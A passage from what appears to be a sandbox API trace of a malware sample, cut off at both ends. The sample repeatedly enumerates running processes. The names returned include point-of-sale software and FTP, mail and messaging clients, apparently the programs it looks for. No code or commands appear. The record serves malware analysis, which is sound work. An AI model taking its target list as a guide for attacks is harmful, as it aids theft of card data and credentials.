szExeFile="edcsvr.exe")) returned 1 [0231.495] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0231.501] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0231.503] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0231.505] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0231.506] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0231.508] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0231.510] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0231.515] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0231.517] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0231.519] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0231.521] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0231.523] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0231.525] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.530] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.532] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0231.534] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0231.536] CloseHandle (hObject=0x2278) returned 1 [0231.536] Sleep (dwMilliseconds=0x64) [0231.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0231.690] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.692] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0231.694] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0231.696] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.697] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0231.703] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.705] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0231.707] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0231.709] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0231.710] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.712] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.808] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0231.810] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.811] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.813] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.814] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.815] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.817] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.818] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.819] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0231.821] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0231.822] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0231.824] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.828] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.829] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0231.831] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0231.832] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0231.833] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0231.835] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.836] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0231.837] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0231.842] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.844] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0231.845] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0231.847] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0231.849] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0231.851] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0231.853] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0231.913] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0231.914] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0231.916] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0231.917] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0231.919] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0231.920] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0231.921] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0231.923] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0231.924] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0231.925] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0231.927] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0231.928] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0231.929] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0231.931] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0231.935] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0231.936] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0231.938] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0231.939] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0231.940] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0231.942] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0231.943] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0231.945] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0231.947] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0231.988] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0231.990] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0231.992] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0231.994] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0231.999] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0232.002] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0232.005] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 